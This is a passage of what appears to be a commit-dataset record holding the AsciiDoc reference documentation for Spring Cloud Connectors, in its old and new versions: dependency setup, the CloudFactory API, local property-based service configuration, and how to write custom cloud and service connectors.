'org.springframework.cloud:spring-cloud-localconfig-connector:${VERSION}'\n \n \/\/ If you intend to deploy the app to Cloud Foundry\n compile 'org.springframework.cloud:spring-cloud-cloudfoundry-connector:${VERSION}'\n\n \/\/ If you intend to deploy the app to Heroku\n compile 'org.springframework.cloud:spring-cloud-heroku-connector:${VERSION}'\n\n}\n----\n\n=== Spring Applications\n\nIf you're writing a Spring application, include the <<Spring Service Connector>> dependency in addition to your cloud connector dependencies.\n\nIn Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-spring-service-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle:\n\n[source,groovy]\n----\ndependencies {\n\n compile 'org.springframework.cloud:spring-cloud-spring-service-connector:${VERSION}'\n\n}\n----\n\nThen follow the instructions in the <<Spring Service Connector>> documentation on Spring configuration <<spring-cloud-spring-service-connector.adoc#_the_java_configuration,using Java configuration>> or the <<spring-cloud-spring-service-connector.adoc#_the_code_cloud_code_namespace,`<cloud>` namespace>>.\n\n=== Non-Spring Applications\n\nThe `spring-cloud-core` dependency is included by each cloud connector, so simply include the connectors for the platforms you want. Then follow the <<_spring_cloud_connectors_core,instructions on using the Spring Cloud Connectors API>>.\n\n== Spring Cloud Connectors Core\n\nThis core library provides programmatic access to application and service information. This library has no Spring dependencies and may be used in non-Spring applications.\n\n**This library requires Java 6 or newer.** It is cloud-agnostic; using the Java SPI, it supports pluggable cloud and service connectors. Support for Cloud Foundry and Heroku is available out-of-the-box, in addition to locally-provided configuration for development and testing.\n\n=== Connecting to a Cloud\n\n[NOTE]\n====\nIf you are using Spring Cloud in a Spring application, you should consider <<_spring_service_connector,automatically injecting Spring beans>> instead.\n====\n\n* Include the desired cloud connectors on the runtime classpath, <<_getting_started,as described in the main documentation>>.\n\n* Create a `CloudFactory` instance. Creation of a `CloudFactory` instance is a bit expensive, so we recommend using a singleton instance. 
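In a plain Java application, one way to do that is a simple holder class - a minimal sketch (the holder itself is illustrative, not part of the Connectors API):\n+\n[source,java]\n----\nimport org.springframework.cloud.CloudFactory;\n\npublic final class CloudFactoryHolder {\n\n    \/\/ Illustrative holder: one CloudFactory for the whole application,\n    \/\/ created once and reused, since construction is expensive.\n    private static final CloudFactory INSTANCE = new CloudFactory();\n\n    private CloudFactoryHolder() {\n    }\n\n    public static CloudFactory instance() {\n        return INSTANCE;\n    }\n}\n----\n+\n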
If you are using a dependency injection framework such as Spring, create a bean for the `CloudFactory`.\n+\n[source,java]\n----\nCloudFactory cloudFactory = new CloudFactory();\n----\n\n* Obtain the `Cloud` object for the environment in which the application is running.\n+\n[source,java]\n----\nCloud cloud = cloudFactory.getCloud();\n----\n+\nNote that you must have a `CloudConnector` suitable for your deployment environment on your classpath. For example, if you are deploying the application to Cloud Foundry, you must add the <<_cloud_foundry_connector,Cloud Foundry Connector>> to your classpath. If no suitable `CloudConnector` is found, the `getCloud()` method will throw a `CloudException`.\n\n* Use the `Cloud` instance to access application and service information and to create service connectors.\n+\n[source,java]\n----\n\/\/ ServiceInfo has all the information necessary to connect to the underlying service\nList<ServiceInfo> serviceInfos = cloud.getServiceInfos();\n----\n+\n[source,java]\n----\n\/\/ Find the `ServiceInfo` definitions suitable for connecting to a particular service type\nList<ServiceInfo> databaseInfos = cloud.getServiceInfos(DataSource.class);\n----\n+\n[source,java]\n----\n\/\/ Alternatively, let Spring Cloud create a service connector for you\nString serviceId = \"inventory-db\";\nDataSource ds = cloud.getServiceConnector(serviceId, DataSource.class,\n null \/* default config *\/);\n----\n\n== Spring Service Connector\n\nSee <<spring-cloud-spring-service-connector.adoc#,Spring Cloud Spring Service Connector>>.\n\n== Cloud Foundry Connector\n\nSee <<spring-cloud-cloud-foundry-connector.adoc#,Spring Cloud Cloud Foundry Connector>>.\n\n== Heroku Connector\n\nSee <<spring-cloud-heroku-connector.adoc#,Spring Cloud Heroku Connector>>.\n\n== local-configuration Connector\n\nThis connector provides the ability to configure Spring Cloud services locally for development or testing. **The current implementation reads from Java properties only.**\n\n=== Quick Start\n\nSince service URIs contain passwords and should not be stored in code, this connector does not attempt to read service definitions out of the classpath. You can provide service definitions as system properties.\n\n[source,term]\n----\njava -Dspring.cloud.database='mysql:\/\/user:pass@host:1234\/dbname' -jar my-app.jar\n----\n\nYou can also provide service definitions from a configuration properties file, either by setting the `spring.cloud.propertiesFile` system property:\n\n[source,term]\n----\njava -Dspring.cloud.propertiesFile=\/path\/to\/spring-cloud.properties -jar my-app.jar\n----\n\nor by providing the bootstrap properties file `spring-cloud-bootstrap.properties` on the runtime classpath. This file will be inspected only for the property named `spring.cloud.propertiesFile`, and its value will be interpolated from the system properties.\n\n[source,properties]\n----\nspring.cloud.propertiesFile: ${user.home}\/.config\/myApp\/spring-cloud.properties\n----\n\nThe system properties, or the configuration properties file, should contain an application ID and the desired services in the following format.\n\n[source,properties]\n----\nspring.cloud.appId: myApp\n; spring.cloud.{id}: URI\nspring.cloud.database: mysql:\/\/user:pass@host:1234\/dbname\n----\n\nThe service type is determined by the URI scheme. 
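For instance, given the definitions above, application code can look up the service by its id - a minimal sketch using the `Cloud` API shown earlier (\"database\" is the id portion of the `spring.cloud.database` key):\n\n[source,java]\n----\nCloudFactory cloudFactory = new CloudFactory();\nCloud cloud = cloudFactory.getCloud();\n\n\/\/ \"database\" matches the spring.cloud.database definition above\nDataSource dataSource = cloud.getServiceConnector(\"database\", DataSource.class,\n        null \/* default config *\/);\n----\n\n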
The connector will activate if it finds a property (either in the system properties or in the configuration properties file) named `spring.cloud.appId`.\n\n=== Property Sources\n\nThis connector first attempts to read the system properties generally and a system property named `spring.cloud.propertiesFile` specifically. If the system properties are not readable (if the security manager denies `checkPropertiesAccess`), then they will be treated as empty. If a system property named `spring.cloud.propertiesFile` is found, then that file will be loaded as a property list.\n\n==== Providing a Bootstrap Properties File\n\nTo avoid having to manually configure run configurations or test runners with the path to the configuration properties file, the connector can read a templated filename out of the runtime classpath. This file must be named `spring-cloud-bootstrap.properties` and be located at the classpath root. For security, the connector will not attempt to read any service URIs out of the file. If the connector does find the file, it will read the property `spring.cloud.propertiesFile` and link:http:\/\/commons.apache.org\/proper\/commons-lang\/javadocs\/api-release\/index.html?org\/apache\/commons\/lang3\/text\/StrSubstitutor.html[substitute the pattern `${system.property}`] with the appropriate value from the system properties. The most useful option is generally `${user.home}`.\n\nA configuration properties file specified in the system properties will override any bootstrap file that may be available on the classpath.\n\n==== Property Precedence\n\nTo provide the maximum configuration flexibility, the connector will override any properties (both application ID and service definitions) specified in the file at `spring.cloud.propertiesFile` with system properties defined at runtime. The connector will log a message at `WARN` if you override a service ID.\n\n=== Activating the Connector\n\nSpring Cloud Core expects exactly one cloud connector to match the runtime environment. This connector identifies the “local cloud” by the presence of a property, in a configuration properties file or in the system properties, named `spring.cloud.appId`. This property will be used in the `ApplicationInstanceInfo`.\n\n=== Service Definitions\n\nIf the connector is activated, it will iterate through all of the available properties for keys matching the pattern `spring.cloud.{serviceId}`. Each value is interpreted as a URI to a service, and the type of service is determined from the scheme. Every standard `UriBasedServiceInfo` is supported.\n\n=== Instance ID\n\nThis connector creates a UUID for use as the instance ID, as Java does not provide any portable mechanism for reliably determining hostnames or PIDs.\n\n== Extending Spring Cloud Connectors\n\nBesides the built-in service and cloud support and the included Spring Service Connector, Spring Cloud Connectors can be extended to support additional cloud platforms, cloud services, or application frameworks. See below for details.\n\n=== Adding Cloud Connectors\n\nTo allow Spring Cloud to detect a new cloud platform, add a cloud connector for the platform. 
A cloud connector determines whether the application is running in the specific cloud, identifies application information (such as the name and instance ID of the particular running instance), and maps bound services (such as URIs exposed in environment variables) as `ServiceInfo` objects.\n\n[TIP]\n====\nSee the https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-cloudfoundry-connector[Cloud Foundry Connector] and https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-heroku-connector[Heroku Connector] for examples.\n====\n\nSpring Cloud uses the https:\/\/docs.oracle.com\/javase\/tutorial\/sound\/SPI-intro.html[Java SPI] to discover available connectors. \n\nYour connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/CloudConnector.html[`CloudConnector`] interface. It includes three methods:\n\n* `boolean isInMatchingCloud()`: Determines whether the connector is operating in the cloud for which it provides support.\n+\nSpring Cloud Connectors will call `isInMatchingCloud()` on each cloud connector included in an application. The first connector to respond `true` will be activated.\n* `ApplicationInstanceInfo getApplicationInstanceInfo()`: Returns information about the running application instance.\n+\nAn `ApplicationInstanceInfo` must provide the instance id (`String`) and application id (`String`). Other properties can be added as needed to a `Map` and be returned via `getProperties()`.\n* `List<ServiceInfo> getServiceInfos()`: Returns a `ServiceInfo` object for each service bound to the application.\n+\n`getServiceInfos()` can return an empty `List` if no services have been bound to the application.\n\nNew cloud connectors should list the fully-qualified class name in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.CloudConnector`.\n\n=== Adding Service Support\n\nTo allow Spring Cloud to discover a new type of service, create a `ServiceInfo` class containing the information necessary to connect to the service. If your service can be specified via a URI, extend http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/org\/springframework\/cloud\/service\/UriBasedServiceInfo.html[`UriBasedServiceInfo`] and provide the URI scheme in a call to the `super` constructor.\n\nThe following class will expose information for a `HelloWorldService` available at `helloworld:\/\/username:password@host:port\/Bonjour`.\n\n[source,java]\n----\npublic class HelloWorldServiceInfo extends UriBasedServiceInfo {\n public static final String URI_SCHEME = \"helloworld\";\n\n \/\/ Needed to support structured service definitions such as Cloud Foundry's\n public HelloWorldServiceInfo(String id, String host, int port, String username, String password, String greeting) {\n super(id, URI_SCHEME, host, port, username, password, greeting);\n }\n\n \/\/ Needed to support URI-based service definitions such as Heroku's\n public HelloWorldServiceInfo(String id, String uri) {\n super(id, uri);\n }\n}\n----\n\nAfter creating the `ServiceInfo` class, you will need to create a `ServiceInfoCreator` for each cloud platform you want to support. 
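As an illustration, a creator for the local-configuration connector might look like the following sketch; it reuses the `HelloWorldServiceInfo` defined above, and it assumes the base class (see the table below) accepts the URI scheme in its constructor:\n\n[source,java]\n----\npublic class HelloWorldServiceInfoCreator\n        extends LocalConfigServiceInfoCreator<HelloWorldServiceInfo> {\n\n    public HelloWorldServiceInfoCreator() {\n        \/\/ Assumption: the base class matches service definitions by this URI scheme.\n        super(HelloWorldServiceInfo.URI_SCHEME);\n    }\n\n    @Override\n    public HelloWorldServiceInfo createServiceInfo(String id, String uri) {\n        return new HelloWorldServiceInfo(id, uri);\n    }\n}\n----\n\n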
If you are adding service support for a cloud platform already supported by Spring Cloud Connectors, you will probably want to extend the appropriate creator base class(es).\n\n[cols=\"2,8\", width=\"100%\"]\n|==================================================================\n|**Cloud Foundry** | Extend `CloudFoundryServiceInfoCreator`.\n|**Heroku** | Extend `HerokuServiceInfoCreator`.\n|**local-configuration** | Extend `LocalConfigServiceInfoCreator`.\n|==================================================================\n\nA `ServiceInfoCreator` often can be as simple as a method that instantiates a new `ServiceInfo`.\n\n[source,java]\n----\n@Override\npublic HelloWorldServiceInfo createServiceInfo(String id, String uri) {\n return new HelloWorldServiceInfo(id, uri);\n}\n----\n\nRegister your `ServiceInfoCreator` classes in the appropriate provider-configuration file for your cloud's `ServiceInfoCreator` base class.\n\n[cols=\"2,8\", width=\"100%\"]\n|=========================================================================================================================================================================\n|**Cloud Foundry** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.cloudfoundry.CloudFoundryServiceInfoCreator`.\n|**Heroku** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.heroku.HerokuServiceInfoCreator`.\n|**local-configuration** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.localconfig.LocalConfigServiceInfoCreator`.\n|=========================================================================================================================================================================\n\n=== Adding Service Connectors\n\nTo allow Spring Cloud to provide framework-specific service objects for supported cloud services, add a service connector for the framework. A service connector consumes a `ServiceInfo` discovered by the cloud connector and converts it into the appropriate service object (such as a `DataSource` in the case of a service definition that represents a SQL database).\n\n[TIP]\n====\nService connectors can be tightly bound to the framework whose service objects they are creating. For example, some connectors in the <<_spring_service_connector,Spring Service Connector>> create connection factories defined by Spring Data, for use in building Spring Data templates.\n====\n\nYour connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/service\/ServiceConnectorCreator.html[`ServiceConnectorCreator`] interface. 
It has three methods:\n\n* `SC create()`: Creates a service connection object from a given `ServiceInfo` and configuration.\n* `Class<SC> getServiceConnectorType()`: Returns the type of the connection object that will be created.\n* `Class<?> getServiceInfoType()`: Returns the type of the `ServiceInfo` that the class will accept.\n\nList the fully-qualified connector class names in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.service.ServiceConnectorCreator`.\n\n","old_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-connectors\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 3\n\n= Spring Cloud Connectors\n\n[[spring-cloud-connectors-install]]\n\n== Introduction\n\nSpring Cloud Connectors provides a simple abstraction for JVM-based applications running on cloud platforms to discover bound services and deployment information at runtime, and provides support for registering discovered services as Spring beans. It is based on a plugin model so that the identical compiled application can be deployed locally or on any of multiple cloud platforms, and it supports custom service definitions through Java Service Provider Interfaces (SPI).\n\nThe Connectors project provides out-of-the-box support for discovering common services on Heroku and Cloud Foundry clouds. It also includes a properties-based connector that can supply configuration for development and testing.\n\n=== Concepts\n\nThe core Connectors concepts are described below.\n\n[cols=\"3,7\", width=\"100%\"]\n|===========================================================================================================================================================================\n|**Cloud Connector** |A platform-specific interface that identifies the presence of the platform and discovers any services bound to the application deployment.\n|**Service Connector** |An object that represents a runtime connection to a service (for example, a `javax.sql.DataSource`).\n|**Service Information** |Information about the underlying service (such as host, port, and credentials).\n|**Application Information** |Information about the application and the particular running instance.\n|===========================================================================================================================================================================\n\n=== Submodules\n\nThe project contains three major submodules.\n\n* **Spring Cloud Connectors Core**: The core library, which is both cloud-agnostic and Spring-agnostic. It provides a programmatic entry point for developers who prefer to access cloud services and application information manually. 
It also provides basic service definitions for several common services (databases, message queues) and an SPI-based extension mechanism for contributing cloud and service connectors.\n* **Spring Cloud Spring Service Connector**: A Spring library that exposes application information, cloud information, and discovered services as Spring beans of the appropriate type (for example, an SQL service will be exposed as a `javax.sql.DataSource` with optional connection pooling).\n* The cloud connectors:\n ** **Spring Cloud Cloud Foundry Connector**: Connector for link:http:\/\/cloudfoundry.org\/[Cloud Foundry].\n ** **Spring Cloud Heroku Connector**: Connector for link:https:\/\/www.heroku.com\/[Heroku].\n ** **Spring Cloud local-configuration Connector**: Properties-based connector for manually providing configuration information during development or testing. Allows use of the same Spring Cloud configuration wiring in all stages of application deployment.\n\n== Getting Started\n\nSee below for examples of how to include the appropriate dependencies using your build system.\n\n=== Including Cloud Connectors\n\nInclude the connector for each cloud platform which you want to be discoverable. Including multiple connectors is perfectly fine; each connector will determine whether it should be active in a particular environment.\n\nIn Maven, replacing `${VERSION}` with the desired artifact version:\n\n[source,xml]\n----\n<!-- To use Spring Cloud Connectors for development -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-localconfig-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Cloud Foundry -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-cloudfoundry-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Heroku -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-heroku-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle, replacing `${VERSION}` with the desired version:\n\n[source,groovy]\n----\ndependencies {\n\n \/\/ To use Spring Cloud Connectors for development\n compile 'org.springframework.cloud:spring-cloud-localconfig-connector:${VERSION}'\n \n \/\/ If you intend to deploy the app to Cloud Foundry\n compile 'org.springframework.cloud:spring-cloud-cloudfoundry-connector:${VERSION}'\n\n \/\/ If you intend to deploy the app to Heroku\n compile 'org.springframework.cloud:spring-cloud-heroku-connector:${VERSION}'\n\n}\n----\n\n=== Spring Applications\n\nIf you're writing a Spring application, include the <<Spring Service Connector>> dependency in addition to your cloud connector dependencies.\n\nIn Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-spring-service-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle:\n\n[source,groovy]\n----\ndependencies {\n\n compile 'org.springframework.cloud:spring-cloud-spring-service-connector:${VERSION}'\n\n}\n----\n\nThen follow the instructions in the <<Spring Service Connector>> documentation on Spring configuration <<spring-cloud-spring-service-connector.adoc#_the_java_configuration,using Java configuration>> or the <<spring-cloud-spring-service-connector.adoc#_the_code_cloud_code_namespace,`<cloud>` namespace>>.\n\n=== Non-Spring Applications\n\nThe 
`spring-cloud-core` dependency is included by each cloud connector, so simply include the connectors for the platforms you want. Then follow the <<_spring_cloud_connectors_core,instructions on using the Spring Cloud Connectors API>>.\n\n== Spring Cloud Connectors Core\n\nThis core library provides programmatic access to application and service information. This library has no Spring dependencies and may be used in non-Spring applications.\n\n**This library requires Java 6 or newer.** It is cloud-agnostic; using the Java SPI, it supports pluggable cloud and service connectors. Support for Cloud Foundry and Heroku is available out-of-the-box, in addition to locally-provided configuration for development and testing.\n\n=== Connecting to a Cloud\n\n[NOTE]\n====\nIf you are using Spring Cloud in a Spring application, you should consider <<_spring_service_connector,automatically injecting Spring beans>> instead.\n====\n\n* Include the desired cloud connectors on the runtime classpath, <<_getting_started,as described in the main documentation>>.\n\n* Create a `CloudFactory` instance. Creation of a `CloudFactory` instance is a bit expensive, so we recommend using a singleton instance. If you are using a dependency injection framework such as Spring, create a bean for the `CloudFactory`.\n+\n[source,java]\n----\nCloudFactory cloudFactory = new CloudFactory();\n----\n\n* Obtain the `Cloud` object for the environment in which the application is running.\n+\n[source,java]\n----\nCloud cloud = cloudFactory.getCloud();\n----\n+\nNote that you must have a `CloudConnector` suitable for your deployment environment on your classpath. For example, if you are deploying the application to Cloud Foundry, you must add the <<_cloud_foundry_connector,Cloud Foundry Connector>> to your classpath. If no suitable `CloudConnector` is found, the `getCloud()` method will throw a `CloudException`.\n\n* Use the `Cloud` instance to access application and service information and to create service connectors.\n+\n[source,java]\n----\n\/\/ ServiceInfo has all the information necessary to connect to the underlying service\nList<ServiceInfo> serviceInfos = cloud.getServiceInfos();\n----\n+\n[source,java]\n----\n\/\/ Find the `ServiceInfo` definitions suitable for connecting to a particular service type\nList<ServiceInfo> databaseInfos = cloud.getServiceInfos(DataSource.class);\n----\n+\n[source,java]\n----\n\/\/ Alternatively, let Spring Cloud create a service connector for you\nString serviceId = \"inventory-db\";\nDataSource ds = cloud.getServiceConnector(serviceId, DataSource.class,\n null \/* default config *\/);\n----\n\n== Spring Service Connector\n\nSee <<spring-cloud-spring-service-connector.adoc#,Spring Cloud Spring Service Connector>>.\n\n== Cloud Foundry Connector\n\nSee <<spring-cloud-cloud-foundry-connector.adoc#,Spring Cloud Cloud Foundry Connector>>.\n\n== Heroku Connector\n\nSee <<spring-cloud-heroku-connector.adoc#,Spring Cloud Heroku Connector>>.\n\n== local-configuration Connector\n\nThis connector provides the ability to configure Spring Cloud services locally for development or testing. **The current implementation reads from Java properties only.**\n\n=== Quick Start\n\nSince service URIs contain passwords and should not be stored in code, this connector does not attempt to read service definitions out of the classpath. 
You can provide service definitions as system properties.\n\n[source,term]\n----\njava -Dspring.cloud.database='mysql:\/\/user:pass@host:1234\/dbname' -jar my-app.jar\n----\n\nYou can also provide service definitions from a configuration properties file, either by setting the `spring.cloud.propertiesFile` system property:\n\n[source,term]\n----\njava -Dspring.cloud.propertiesFile=\/path\/to\/spring-cloud.properties -jar my-app.jar\n----\n\nor by providing the bootstrap properties file `spring-cloud-bootstrap.properties` on the runtime classpath. This file will be inspected only for the property named `spring.cloud.propertiesFile`, and its value will be interpolated from the system properties.\n\n[source,properties]\n----\nspring.cloud.propertiesFile: ${user.home}\/.config\/myApp\/spring-cloud.properties\n----\n\nThe system properties, or the configuration properties file, should contain an application ID and the desired services in the following format.\n\n[source,properties]\n----\nspring.cloud.appId: myApp\n; spring.cloud.{id}: URI\nspring.cloud.database: mysql:\/\/user:pass@host:1234\/dbname\n----\n\nThe service type is determined by the URI scheme. The connector will activate if it finds a property (either in the system properties or in the configuration properties file) named `spring.cloud.appId`.\n\n=== Property Sources\n\nThis connector first attempts to read the system properties generally and a system property named `spring.cloud.propertiesFile` specifically. If the system properties are not readable (if the security manager denies `checkPropertiesAccess`), then they will be treated as empty. If a system property named `spring.cloud.propertiesFile` is found, then that file will be loaded as a property list.\n\n==== Providing a Bootstrap Properties File\n\nTo avoid having to manually configure run configurations or test runners with the path to the configuration properties file, the connector can read a templated filename out of the runtime classpath. This file must be named `spring-cloud-bootstrap.properties` and be located at the classpath root. For security, the connector will not attempt to read any service URIs out of the file. If the connector does find the file, it will read the property `spring.cloud.propertiesFile` and link:http:\/\/commons.apache.org\/proper\/commons-lang\/javadocs\/api-release\/index.html?org\/apache\/commons\/lang3\/text\/StrSubstitutor.html[substitute the pattern `${system.property}`] with the appropriate value from the system properties. The most useful option is generally `${user.home}`.\n\nA configuration properties file specified in the system properties will override any bootstrap file that may be available on the classpath.\n\n==== Property Precedence\n\nTo provide the maximum configuration flexibility, the connector will override any properties (both application ID and service definitions) specified in the file at `spring.cloud.propertiesFile` with system properties defined at runtime. The connector will log a message at `WARN` if you override a service ID.\n\n=== Activating the Connector\n\nSpring Cloud Core expects exactly one cloud connector to match the runtime environment. This connector identifies the “local cloud” by the presence of a property, in a configuration properties file or in the system properties, named `spring.cloud.appId`. 
This property will be used in the `ApplicationInstanceInfo`.\n\n=== Service Definitions\n\nIf the connector is activated, it will iterate through all of the available properties for keys matching the pattern `spring.cloud.{serviceId}`. Each value is interpreted as a URI to a service, and the type of service is determined from the scheme. Every standard `UriBasedServiceInfo` is supported.\n\n=== Instance ID\n\nThis connector creates a UUID for use as the instance ID, as Java does not provide any portable mechanism for reliably determining hostnames or PIDs.\n\n== Extending Spring Cloud Connectors\n\nBesides the built-in service and cloud support and the included Spring Service Connector, Spring Cloud Connectors can be extended to support additional cloud platforms, cloud services, or application frameworks. See below for details.\n\n=== Adding Cloud Connectors\n\nTo allow Spring Cloud to detect a new cloud platform, add a cloud connector for the platform. A cloud connector determines whether the application is running in the specific cloud, identifies application information (such as the name and instance ID of the particular running instance), and maps bound services (such as URIs exposed in environment variables) as `ServiceInfo` objects.\n\n[TIP]\n====\nSee the https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-cloudfoundry-connector[Cloud Foundry Connector] and https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-heroku-connector[Heroku Connector] for examples.\n====\n\nSpring Cloud uses the https:\/\/docs.oracle.com\/javase\/tutorial\/sound\/SPI-intro.html[Java SPI] to discover available connectors. \n\nTo add new cloud connectors, your connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/CloudConnector.html[`CloudConnector`] interface. It includes three methods:\n\n* `boolean isInMatchingCloud()`: Determines whether the connector is operating in the cloud for which it provides support.\n+\nSpring Cloud Connectors will call `isInMatchingCloud()` on each cloud connector included in an application. The first connector to respond `true` will be activated.\n* `ApplicationInstanceInfo getApplicationInstanceInfo()`: Returns information about the running application instance.\n+\nAn `ApplicationInstanceInfo` must provide the instance id (`String`) and application id (`String`). Other properties can be added as needed to a `Map` and be returned via `getProperties()`.\n* `List<ServiceInfo> getServiceInfos()`: Returns a `ServiceInfo` object for each service bound to the application.\n+\n`getServiceInfos()` can return an empty `List` if no services have been bound to the application.\n\nNew cloud connectors should list the fully-qualified class name in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.CloudConnector`.\n\n=== Adding Service Support\n\nTo allow Spring Cloud to discover a new type of service, create a `ServiceInfo` class containing the information necessary to connect to the service. 
If your service can be specified via a URI, extend http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/org\/springframework\/cloud\/service\/UriBasedServiceInfo.html[`UriBasedServiceInfo`] and provide the URI scheme in a call to the `super` constructor.\n\nThe following class will expose information for a `HelloWorldService` available at `helloworld:\/\/username:password@host:port\/Bonjour`.\n\n[source,java]\n----\npublic class HelloWorldServiceInfo extends UriBasedServiceInfo {\n public static final String URI_SCHEME = \"helloworld\";\n\n \/\/ Needed to support structured service definitions such as Cloud Foundry's\n public HelloWorldServiceInfo(String id, String host, int port, String username, String password, String greeting) {\n super(id, URI_SCHEME, host, port, username, password, greeting);\n }\n\n \/\/ Needed to support URI-based service definitions such as Heroku's\n public HelloWorldServiceInfo(String id, String uri) {\n super(id, uri);\n }\n}\n----\n\nAfter creating the `ServiceInfo` class, you will need to create a `ServiceInfoCreator` for each cloud platform you want to support. If you are adding service support for a cloud platform already supported by Spring Cloud Connectors, you will probably want to extend the appropriate creator base class(es).\n\n[cols=\"2,8\", width=\"100%\"]\n|==================================================================\n|**Cloud Foundry** | Extend `CloudFoundryServiceInfoCreator`.\n|**Heroku** | Extend `HerokuServiceInfoCreator`.\n|**local-configuration** | Extend `LocalConfigServiceInfoCreator`.\n|==================================================================\n\nA `ServiceInfoCreator` often can be as simple as a method that instantiates a new `ServiceInfo`.\n\n[source,java]\n----\n@Override\npublic HelloWorldServiceInfo createServiceInfo(String id, String uri) {\n return new HelloWorldServiceInfo(id, uri);\n}\n----\n\nRegister your `ServiceInfoCreator` classes in the appropriate provider-configuration file for your cloud's `ServiceInfoCreator` base class.\n\n[cols=\"2,8\", width=\"100%\"]\n|=========================================================================================================================================================================\n|**Cloud Foundry** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.cloudfoundry.CloudFoundryServiceInfoCreator`.\n|**Heroku** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.heroku.HerokuServiceInfoCreator`.\n|**local-configuration** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.localconfig.LocalConfigServiceInfoCreator`.\n|=========================================================================================================================================================================\n\n=== Adding Service Connectors\n\nTo allow Spring Cloud to provide framework-specific service objects for supported cloud services, add a service connector for the framework. A service connector consumes a `ServiceInfo` discovered by the cloud connector and converts it into the appropriate service object (such as a `DataSource` in the case of a service definition that represents a SQL database).\n\n[TIP]\n====\nService connectors can be tightly bound to the framework whose service objects they are creating. 
For example, some connectors in the <<_spring_service_connector,Spring Service Connector>> create connection factories defined by Spring Data, for use in building Spring Data templates.\n====\n\nTo add new service connectors, your connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/service\/ServiceConnectorCreator.html[`ServiceConnectorCreator`] interface. It has three methods:\n\n* `SC create()`: Creates a service connection object from a given `ServiceInfo` and configuration.\n* `Class<SC> getServiceConnectorType()`: Returns the type of the connection object that will be created.\n* `Class<?> getServiceInfoType()`: Returns the type of the `ServiceInfo` that the class will accept.\n\nList the fully-qualified connector class names in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.service.ServiceConnectorCreator`.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aed4f58403ca56a408f24b84186253c89ca07371","subject":"Fix capitalization of Testcontainers in Howto docs","message":"Fix capitalization of Testcontainers in Howto docs\n\nSee gh-21417\n","repos":"jxblum\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,mbenson\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,mdeinum\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,chrylis\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,mbenson\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,yangdd1205\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,royclarkson\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,shakuzen\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,michael-simons\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,royclar